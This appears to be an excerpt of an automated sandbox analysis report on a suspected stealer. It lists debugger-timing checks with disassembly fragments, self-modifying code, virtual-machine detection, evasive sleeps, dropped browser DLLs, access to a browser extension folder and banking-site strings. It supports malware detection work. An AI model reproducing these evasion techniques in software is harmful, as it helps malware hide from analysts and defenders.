Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD090B second address: 4AD092B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF7C6A41B5h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD092B second address: 4AD0976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAF7CBD5D3Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 call 00007FAF7CBD5D3Eh 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a call 00007FAF7CBD5D41h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD0976 second address: 4AD0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop ebp 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a mov di, FADCh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60D0B second address: 4A60D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60D11 second address: 4A60D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60D2E second address: 4A60DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 86h 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FAF7CBD5D3Fh 0x0000000d adc eax, 1426D4DEh 0x00000013 jmp 00007FAF7CBD5D49h 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FAF7CBD5D3Ah 0x00000022 adc ch, FFFFFFD8h 0x00000025 jmp 00007FAF7CBD5D3Bh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FAF7CBD5D3Bh 0x00000036 and si, 8F9Eh 0x0000003b jmp 00007FAF7CBD5D49h 0x00000040 popfd 0x00000041 jmp 00007FAF7CBD5D40h 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60DC3 second address: 4A60DD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41AEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4A60DD5 second address: 4A60DF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, 0736h 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD0C31 second address: 4AD0C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD0C35 second address: 4AD0C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD0C3B second address: 4AD0C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FAF7C6A41ABh 0x00000011 mov ebp, esp 0x00000013 jmp 00007FAF7C6A41B6h 0x00000018 push dword ptr [ebp+0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF7C6A41B7h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 4AD0C86 second address: 4AD0CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1B9D21EAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f movzx eax, di 0x00000012 movsx edi, ax 0x00000015 popad 0x00000016 push 5EEB19C3h 0x0000001b jmp 00007FAF7CBD5D47h 0x00000020 xor dword ptr [esp], 5EEA19C1h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAF7CBD5D40h 0x00000030 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Special instruction interceptor: First address: 62C975 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Special instruction interceptor: First address: 62CA51 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Special instruction interceptor: First address: 62A26E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Special instruction interceptor: First address: 803CFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 4BC975 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 4BCA51 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 4BA26E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 693CFB instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Code function: 8_2_04AD0BAF rdtsc 8_2_04AD0BAF
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2168 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3421 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 393 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 2965 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 671 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1153 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe API coverage: 0.8 %
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe API coverage: 0.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe TID: 2420 Thread sleep count: 275 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6824 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6824 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5340 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5340 Thread sleep time: -90045s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5360 Thread sleep count: 393 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5360 Thread sleep time: -11790000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5688 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5688 Thread sleep time: -126063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6544 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3040 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3040 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476 Thread sleep count: 2965 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476 Thread sleep time: -5932965s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476 Thread sleep count: 671 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3476 Thread sleep time: -1342671s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3704 Thread sleep count: 1153 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 3704 Thread sleep time: -2307153s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe TID: 3928 Thread sleep count: 349 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C8DC930
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: AAFBAKEC.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: AAFBAKEC.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: AFHDAKJKFC.exe, AFHDAKJKFC.exe, 00000008.00000002.2394575853.00000000007BB000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, explortu.exe, 0000000A.00000002.2412835457.000000000064B000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: AAFBAKEC.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: AAFBAKEC.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: AAFBAKEC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
